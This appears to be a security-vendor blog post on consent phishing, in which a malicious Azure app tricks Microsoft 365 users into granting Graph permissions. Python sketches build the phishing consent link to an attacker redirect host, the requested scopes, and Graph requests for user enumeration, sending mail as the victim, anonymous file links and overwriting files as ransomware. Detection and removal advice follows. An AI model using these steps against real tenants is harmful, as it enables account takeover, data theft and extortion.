Using malware in Azure to gain access to Microsoft 365 tenants



Phishing remains one of the most successful ways to infiltrate an organization. We have seen a huge number of malware infections arising from users opening infected attachments or following links to malicious sites that tried to compromise vulnerable browsers or plugins.

Now that organizations are moving to Microsoft 365 at such a fast pace, we are seeing a new attack vector: malicious Azure applications.

As you will see below, cybercriminals can create, mask and deploy malicious Azure applications for use in their phishing campaigns. Azure applications do not require approval from Microsoft and, more importantly, they do not require code execution on the user's computer, which makes it easy to bypass detection tools and antivirus programs on workstations.

Once the attacker convinces the victim to install the malicious Azure application, the attacker can find out which organization the victim belongs to, access the victim's files, read their email, send email on the victim's behalf (great for internal phishing) and much more.

What are Azure apps?


Microsoft created the Azure Application Service to enable users to create their own cloud-based applications that can call and use Azure APIs and resources. This makes it easy to create powerful custom programs that integrate with the Microsoft 365 ecosystem.

One of the most commonly used APIs in Azure is the MS Graph API. It lets applications interact with the user's environment: users, groups, OneDrive documents, Exchange Online mailboxes and chats.



Just as your iPhone asks whether an application may access your contacts or location, Azure asks you to grant the application access to the resources it needs. An attacker can abuse this mechanism to trick a user into granting an application access to one or more sensitive cloud resources.

How the attack works


To perform this attack, the attacker needs the web application itself and an Azure tenant to host it. Once everything is set up, the phishing campaign can begin, using a link that installs the Azure application.



The link in the email directs the user to a website controlled by the attackers (for example, myapp.malicious.com), which in turn redirects the victim to the Microsoft login page. The authentication process is handled entirely by Microsoft, so multi-factor authentication is not a defense here.
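As a sketch, the consent link in such an email is just a standard Microsoft identity platform authorize URL pointing at the attacker's app registration. The client ID below is a made-up placeholder, the redirect URI reuses the example domain above, and the scope list is illustrative:

```python
# Sketch of a malicious consent link; client_id and redirect_uri are placeholders.
from urllib.parse import urlencode

def build_consent_url(client_id, redirect_uri, scopes):
    """Authorize URL that triggers the Microsoft consent prompt for the
    delegated Graph scopes the application requests."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": " ".join(scopes),
    }
    return ("https://login.microsoftonline.com/common/oauth2/v2.0/authorize?"
            + urlencode(params))

url = build_consent_url(
    "11111111-2222-3333-4444-555555555555",   # attacker's app id (made up)
    "https://myapp.malicious.com/callback",   # attacker-controlled redirect
    ["User.Read", "Mail.Read", "Files.ReadWrite.All"],
)
```

Because login.microsoftonline.com handles the sign-in itself, the page the victim sees is genuine, which is why multi-factor authentication does not stop the attack.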

As soon as the user signs in to their Microsoft 365 account, a token is created for the malicious application, and the user is asked to log in and grant the application the permissions it requests. Here is what it looks like to the end user (and it should look very familiar if the user has ever installed an application in SharePoint or Teams):



Here are the MS Graph API permissions the attacker requests in the code of our application:
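The exact permissions from our application are not reproduced here; the list below is an assumed set of delegated Graph scopes (the scope names are real, the selection is illustrative) that would match the capabilities demonstrated in the rest of this article:

```python
# Assumed set of delegated Microsoft Graph scopes a malicious app might request.
GRAPH_SCOPES = [
    "User.Read",            # profile of the signed-in user (the "Me" section)
    "User.ReadBasic.All",   # basic profile of every user in the directory
    "Mail.ReadWrite",       # read the victim's mailbox
    "Mail.Send",            # send mail as the victim (internal phishing)
    "Files.ReadWrite.All",  # read and modify OneDrive/SharePoint files
    "Calendars.ReadWrite",  # view, create and delete calendar events
    "People.Read",          # the victim's communication circle
]
```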



As you can see, the attacker controls the application's name ("MicrosoftOffice") and icon (we used the OneNote icon). The URL is a valid Microsoft URL, and the certificate is valid as well.

However, the attacker's tenant name and a warning message appear under the application name, and neither can be hidden. The attacker's hope is that the user will be in a hurry, see a familiar icon and skim past this information as quickly and thoughtlessly as a terms-of-use notice.

By clicking "Accept", the victim grants our application these permissions on behalf of their account; the application will be able to read the victim's email and access any files the victim can access.

This is the only step that requires the victim's consent; from this point on, the attacker has full control over the user's account and resources.

After consenting, the victim is redirected to a website of our choice. Looking up the user's recently accessed files and redirecting them to one of the recently opened internal SharePoint documents is a good trick for arousing minimal suspicion.

What the attacker gains


This attack is well suited for the following activities:

  • Reconnaissance (listing accounts, groups and objects in the victim's tenant);
  • Internal phishing;
  • Theft of data from file storage and email.

To illustrate the power of our Azure application, we built a simple console application to display the resources we accessed as part of our proof-of-concept (PoC) test.



The “Me” section shows the victim's details:



The “Users” section shows the same metadata for every individual user in the organization, including email address, mobile phone number, job title and more, depending on the attributes in the organization's Active Directory. This API call alone can constitute a massive breach of data protection regulations, especially under the GDPR and CCPA.
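A sketch of the underlying Graph call, assuming the token obtained through the consent flow; the helper only builds the request, which can then be sent with any HTTP client and an `Authorization: Bearer <token>` header:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def users_request(fields=("displayName", "mail", "mobilePhone", "jobTitle")):
    """(method, url) enumerating every directory user with the attributes
    described above; the User.ReadBasic.All scope is enough for this call."""
    return ("GET", f"{GRAPH}/users?$select=" + ",".join(fields))
```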



The “Calendar” section shows us the victim's calendar events. We can also schedule appointments on the victim's behalf, view existing meetings and even delete upcoming ones.
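The calendar operations map onto standard Graph endpoints; a hedged sketch of the two request shapes (sent with an HTTP client and the victim's bearer token):

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def upcoming_events_request():
    """(method, url) listing the victim's calendar events."""
    return ("GET", f"{GRAPH}/me/events?$select=subject,start,end,attendees")

def delete_event_request(event_id):
    """(method, url); Calendars.ReadWrite also lets us delete a meeting."""
    return ("DELETE", f"{GRAPH}/me/events/{event_id}")
```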

Perhaps the most important section of our console application is “RecentFiles”, which lists any file the user has accessed in OneDrive or SharePoint. We can also upload or modify files (including files with malicious macros, to further the attack).



IMPORTANT: when we access a file through this API, Azure creates a unique link. This link is accessible to anyone from anywhere, even if the organization does not allow anonymous link sharing for ordinary Microsoft 365 users.
These API-generated links are special. Frankly, we are not sure why they are not blocked by the organization's link-sharing policy; perhaps Microsoft does not want to break existing applications when the policy changes. The application can request a download link or an edit link - in our PoC we requested both.
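A sketch of the call that produces those links: Graph's `createLink` action on a drive item, with `view` for a download link and `edit` for a modification link (our PoC requested both). The item ID is a placeholder:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def create_link_request(item_id, link_type):
    """(method, url, body) for the createLink action on a drive item;
    link_type is 'view' (download) or 'edit' (modify)."""
    return ("POST", f"{GRAPH}/me/drive/items/{item_id}/createLink",
            {"type": link_type})
```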

The “Outlook” section gives us full access to the victim's email. We can see the recipients of any message, filter messages by priority, send emails (internal phishing) and much more.



By reading the victim's emails, we can map out their circle of contacts, identify the most vulnerable ones, and send internal phishing emails on the victim's behalf to push the attack deeper into the organization. We can also use the victim's email address and contacts to exfiltrate the data we find in Microsoft 365.
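A sketch of the internal-phishing primitive, assuming Mail.Send consent; the message is built for Graph's `sendMail` action and leaves the victim's own mailbox, so it looks like ordinary internal mail:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def internal_phish_request(to_address, subject, body_html):
    """(method, url, body) sending mail as the victim via Graph sendMail."""
    message = {
        "message": {
            "subject": subject,
            "body": {"contentType": "HTML", "content": body_html},
            "toRecipients": [{"emailAddress": {"address": to_address}}],
        }
    }
    return ("POST", f"{GRAPH}/me/sendMail", message)
```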

Moreover, Microsoft has an API that provides information about the victim’s current communication circle:
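That API is Graph's People endpoint, which returns contacts ordered by how often the user communicates with them; effectively a ready-made target list. A hedged sketch of the request:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def communication_circle_request(top=10):
    """(method, url) for the People API (People.Read scope); results are
    ranked by communication relevance to the signed-in user."""
    return ("GET", f"{GRAPH}/me/people?$top={top}")
```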



As we mentioned above, we can modify user files, subject to the relevant permissions. But what happens if we use the API to modify files maliciously?



One option is to turn our malicious Azure application into ransomware that remotely encrypts the files the victim can modify on SharePoint and OneDrive:



That said, this method of encrypting files is not fully reliable, since files can be restored in tenants with stricter backup and versioning settings; tenants with default configurations, however, risk losing data permanently. Alternatively, we can always exfiltrate confidential data and threaten to publish it unless a ransom is paid.
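A minimal sketch of such remote encryption, assuming Files.ReadWrite.All consent. Only the Graph request shapes are built here, and the XOR transform is a deliberate placeholder; a real attack would use proper authenticated encryption:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def recent_files_request():
    """(method, url) for the files the victim recently opened."""
    return ("GET", f"{GRAPH}/me/drive/recent")

def overwrite_request(item_id, ciphertext):
    """(method, url, body) replacing a drive item's content in place."""
    return ("PUT", f"{GRAPH}/me/drive/items/{item_id}/content", ciphertext)

def toy_encrypt(data, key):
    """Placeholder XOR transform; NOT real cryptography."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
```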

Other sources:

  • Kevin Mitnick demonstrated a similar cloud-based encryption method applied to mailboxes;
  • Krebs on Security also covered such an attack in a good blog post.

How serious is the problem?


Awareness of this phishing technique is still relatively low. Many experts do not appreciate the damage an attacker can do when just one employee in the organization grants access to a malicious Azure application. Consenting to an Azure application is not much different from running a malicious .exe file or enabling macros in a document from an unknown sender. But because this newer vector requires no code execution on the user's machine, it is harder to detect and block.

How about disabling all third-party applications?


Microsoft does not recommend banning users outright from granting permissions to applications:
“You can disable integrated applications for your tenant. This is a drastic step that globally removes end users' ability to grant consent at the tenant level. It prevents your users from inadvertently granting access to a malicious application. This is not strongly recommended, as it seriously impairs your users' ability to work with third-party applications.”

How can I detect abuse of Azure apps?


The easiest way to detect rogue permission grants is to monitor consent events in Azure AD and regularly review your Enterprise Applications in the Azure portal.
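As a sketch, those consent events can be pulled from the Azure AD audit log through Graph; 'Consent to application' is the activity name Azure AD records when a user grants permissions to an app, and the query itself needs the AuditLog.Read.All scope:

```python
from urllib.parse import quote

def consent_audit_url():
    """Audit-log query URL returning application-consent events."""
    f = quote("activityDisplayName eq 'Consent to application'")
    return f"https://graph.microsoft.com/v1.0/auditLogs/directoryAudits?$filter={f}"
```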

Always ask yourself questions:

  • Do I know this app?
  • Does it belong to an organization that I know?

For Varonis customers: the DatAlert module includes threat models that detect malicious permission grants. You can also create your own notification rules for new Azure app consents.

How to remove malicious applications?


In the Azure portal, go to the "Enterprise Applications" section of the "Azure Active Directory" blade and remove the offending applications. An ordinary user can revoke previously granted permissions by going to myapps.microsoft.com, reviewing the applications listed there and revoking permissions as needed.
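The same cleanup can be scripted against Graph: an administrator lists the delegated grants held by the enterprise application (its service principal) and deletes them; deleting the grant object revokes the permissions. The IDs below are placeholders:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def list_grants_request(service_principal_id):
    """(method, url) listing an app's delegated permission grants."""
    return ("GET",
            f"{GRAPH}/servicePrincipals/{service_principal_id}/oauth2PermissionGrants")

def revoke_grant_request(grant_id):
    """(method, url); deleting the oAuth2PermissionGrant revokes the consent."""
    return ("DELETE", f"{GRAPH}/oauth2PermissionGrants/{grant_id}")
```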

See Microsoft's official guidelines for detailed instructions.
